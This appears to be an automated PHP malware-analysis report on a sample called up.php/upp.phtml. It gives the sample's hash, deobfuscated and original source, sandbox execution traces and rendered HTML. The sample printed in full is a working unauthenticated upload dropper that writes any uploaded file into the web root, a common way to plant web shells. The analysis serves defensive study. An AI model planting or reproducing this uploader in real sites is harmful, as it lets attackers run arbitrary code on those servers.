PHP Malware Analysis

up.php, upp.phtml

md5: 939c4df51ec68102ee287f917b2c676b

Attributes

Files

Input


Deobfuscated PHP code

<!DOCTYPE html>
<html>
<body>

<form method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>
<?php 
$target_file = basename($_FILES["fileToUpload"]["name"]);
if (isset($_POST["submit"])) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file " . basename($_FILES["fileToUpload"]["name"]) . " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}

Execution traces

data/traces/939c4df51ec68102ee287f917b2c676b_trace-1676245605.4822.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:47:11.380054]
1	0	1	0.000224	393512
1	3	0	0.000305	396336	{main}	1		/var/www/html/uploads/upp.phtml	0	0
2	4	0	0.000356	396336	basename	0		/var/www/html/uploads/upp.phtml	14	1	NULL
2	4	1	0.000376	396400
2	4	R			''
1		A						/var/www/html/uploads/upp.phtml	14	$target_file = ''
1	3	1	0.000413	396368
			0.000446	314296
TRACE END   [2023-02-12 21:47:11.380323]

data/traces/939c4df51ec68102ee287f917b2c676b_trace-1676253520.3169.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:59:06.214754]
1	0	1	0.000147	393464
1	3	0	0.000207	396288	{main}	1		/var/www/html/uploads/up.php	0	0
2	4	0	0.000245	396288	basename	0		/var/www/html/uploads/up.php	14	1	NULL
2	4	1	0.000260	396352
2	4	R			''
1		A						/var/www/html/uploads/up.php	14	$target_file = ''
1	3	1	0.000288	396320
			0.000313	314272
TRACE END   [2023-02-12 23:59:06.214950]


Generated HTML code

<html><head></head><body>

<form method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>



</body></html>

Original PHP code

<!DOCTYPE html>
<html>
<body>

<form method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>
<?php
$target_file = basename($_FILES["fileToUpload"]["name"]);

if(isset($_POST["submit"])) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>